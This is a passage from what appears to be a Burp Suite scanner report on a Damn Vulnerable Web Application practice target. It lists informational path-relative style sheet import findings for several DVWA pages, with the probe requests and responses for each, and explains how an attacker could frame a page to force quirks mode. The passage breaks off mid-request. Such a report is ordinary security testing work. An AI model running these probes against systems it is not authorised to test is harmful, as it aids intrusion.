Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: JavaScript Attacks :: Damn Vulnerable Web Application (DV
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 3
POST /vulnerabilities/javascript/index.php/q2n1rs/dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=6e6a7523219fb665633f9393ffa391c8
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/javascript/
Content-Type: application/x-www-form-urlencoded
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 66
token=8b479aefbd90795395b3e7089ae0dc09&phrase=ChangeMe&send=Submit
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:45:27 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 8321
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: JavaScript Attacks :: Damn Vulnerable Web Application (DV
...[SNIP]...
19.15. https://pentest-ground.com:4280/vulnerabilities/open_redirect/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/open_redirect/ |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
GET /vulnerabilities/open_redirect/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=34b665b57f17eb6f13041213e5ff7700
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:53:25 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4241
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Open HTTP Redirect :: Damn Vulnerable Web Application (DV
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 2
GET /vulnerabilities/open_redirect/index.php/jmkm1e/xu4nq2/g4421x/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=34b665b57f17eb6f13041213e5ff7700
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:54:51 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4241
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Open HTTP Redirect :: Damn Vulnerable Web Application (DV
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 3
GET /vulnerabilities/open_redirect/index.php/jmkm1e/dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=34b665b57f17eb6f13041213e5ff7700
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:54:51 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4241
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Open HTTP Redirect :: Damn Vulnerable Web Application (DV
...[SNIP]...
19.16. https://pentest-ground.com:4280/vulnerabilities/open_redirect/source/info.php
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Tentative |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/open_redirect/source/info.php |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The response contains a path-relative style sheet import, and so condition 1 for an exploitable vulnerability is present (see issue background). The response can also be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.) This means that condition 3 for an exploitable vulnerability is probably present if condition 2 is present.
Burp was not able to confirm that the other conditions hold, and you should manually investigate this issue to confirm whether they do hold.
Request 1
GET /vulnerabilities/open_redirect/source/info.php?id=2 HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=f079d932222ae8e5723af3687b12a613
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/open_redirect/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:48:02 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4193
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: Open HTTP Redirect :: Damn Vulnerable Web Application (DV
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../../favicon.ico" />
...[SNIP]...
19.17. https://pentest-ground.com:4280/vulnerabilities/sqli/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/sqli/ |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
GET /vulnerabilities/sqli/?id=946146&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=21775aa7d09a4979abf3a2808b744447
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:47:26 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4064
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: SQL Injection :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 2
GET /vulnerabilities/sqli/index.php/orwsda/yyl3us/z4zqob/?id=946146&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=21775aa7d09a4979abf3a2808b744447
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:52:11 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4064
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: SQL Injection :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 3
GET /vulnerabilities/sqli/index.php/orwsda/dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=21775aa7d09a4979abf3a2808b744447
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:52:12 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4064
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: SQL Injection :: Damn Vulnerable Web Application (DVWA)</
...[SNIP]...
19.18. https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/sqli_blind/ |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
GET /vulnerabilities/sqli_blind/?id=294674&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=bb0d2fb4fc8ac53df561e452c87d7462
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Response 1
HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:46:14 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4179
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: SQL Injection (Blind) :: Damn Vulnerable Web Application
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 2
GET /vulnerabilities/sqli_blind/index.php/tzozw5/hon949/nm4iqe/?id=294674&Submit=Submit HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=bb0d2fb4fc8ac53df561e452c87d7462
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 2
HTTP/1.1 404 Not Found
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:46:46 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4179
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: SQL Injection (Blind) :: Damn Vulnerable Web Application
...[SNIP]...
</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 3
GET /vulnerabilities/sqli_blind/index.php/tzozw5/dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=bb0d2fb4fc8ac53df561e452c87d7462
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/sqli_blind/
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 0
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:46:46 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4131
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: SQL Injection (Blind) :: Damn Vulnerable Web Application
...[SNIP]...
19.19. https://pentest-ground.com:4280/vulnerabilities/upload/
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/upload/ |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
POST /vulnerabilities/upload/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=c3fe1bc74b5052e630d33195ac436b03
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/upload/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0NbBo2XreaJ5VlCk
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 401
------WebKitFormBoundary0NbBo2XreaJ5VlCk
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
------WebKitFormBoundary0NbBo2XreaJ5VlCk
Content-Disposition: form-data; name="uploaded"; fil
...[SNIP]...
Response 1
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:40:47 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4050
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Upload :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 2
POST /vulnerabilities/upload/index.php/en2khe/q76nvd/e2je7j/ HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=c3fe1bc74b5052e630d33195ac436b03
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/upload/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0NbBo2XreaJ5VlCk
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 401
------WebKitFormBoundary0NbBo2XreaJ5VlCk
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
------WebKitFormBoundary0NbBo2XreaJ5VlCk
Content-Disposition: form-data; name="uploaded"; fil
...[SNIP]...
Response 2
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:46:58 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4050
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Upload :: Damn Vulnerable Web Application (DVWA)</title>
<link rel="stylesheet" type="text/css" href="../../dvwa/css/main.css" />
<link rel="icon" type="\image/ico" href="../../favicon.ico" />
...[SNIP]...
Request 3
POST /vulnerabilities/upload/index.php/en2khe/dvwa/css/main.css HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
Cache-Control: max-age=0
Cookie: security=low; PHPSESSID=c3fe1bc74b5052e630d33195ac436b03
Origin: https://pentest-ground.com:4280
Upgrade-Insecure-Requests: 1
Referer: https://pentest-ground.com:4280/vulnerabilities/upload/
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary0NbBo2XreaJ5VlCk
Sec-CH-UA: ".Not/A)Brand";v="99", "Google Chrome";v="129", "Chromium";v="129"
Sec-CH-UA-Platform: Windows
Sec-CH-UA-Mobile: ?0
Content-Length: 401
------WebKitFormBoundary0NbBo2XreaJ5VlCk
Content-Disposition: form-data; name="MAX_FILE_SIZE"
100000
------WebKitFormBoundary0NbBo2XreaJ5VlCk
Content-Disposition: form-data; name="uploaded"; fil
...[SNIP]...
Response 3
HTTP/1.1 200 OK
Server: nginx/1.27.2
Date: Mon, 21 Oct 2024 09:46:58 GMT
Content-Type: text/html;charset=utf-8
Content-Length: 4050
Connection: close
X-Powered-By: PHP/8.3.12
Expires: Tue, 23 Jun 2009 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
<!DOCTYPE html>
<html lang="en-GB">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<title>Vulnerability: File Upload :: Damn Vulnerable Web Application (DVWA)</ti
...[SNIP]...
19.20. https://pentest-ground.com:4280/vulnerabilities/view_help.php
Previous
Next
Summary
|
Severity: |
Information |
Confidence: |
Firm |
Host: |
https://pentest-ground.com:4280 |
Path: |
/vulnerabilities/view_help.php |
Issue detail
The application may be vulnerable to path-relative style sheet import (PRSSI) attacks. The first four conditions for an exploitable vulnerability are present (see issue background):- The original response contains a path-relative style sheet import (see response 1).
- When superfluous path-like data is placed into the URL following the original filename (see request 2), the application's response still contains a path-relative style sheet import (see response 2).
- Response 2 can be made to render in a browser's quirks mode. Although the page contains a modern doctype directive, the response does not prevent itself from being framed. An attacker can frame the response within a page that they control, to force it to be rendered in quirks mode. (Note that this technique is IE-specific and due to P3P restrictions might sometimes limit the impact of a successful attack.)
- When the path-relative style sheet import in response 2 is requested (see request 3) the application returns something other than the CSS response that was supposed to be imported (see response 3).
It was not verified whether condition 5 holds (see issue background), and you should manually investigate whether it is possible to manipulate some text within response 3, to enable full exploitation of this issue.
Request 1
GET /vulnerabilities/view_help.php?id=brute&security=low&locale=en HTTP/1.1
Host: pentest-ground.com:4280
Accept-Encoding: gzip, deflate, br
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36
Connection: close
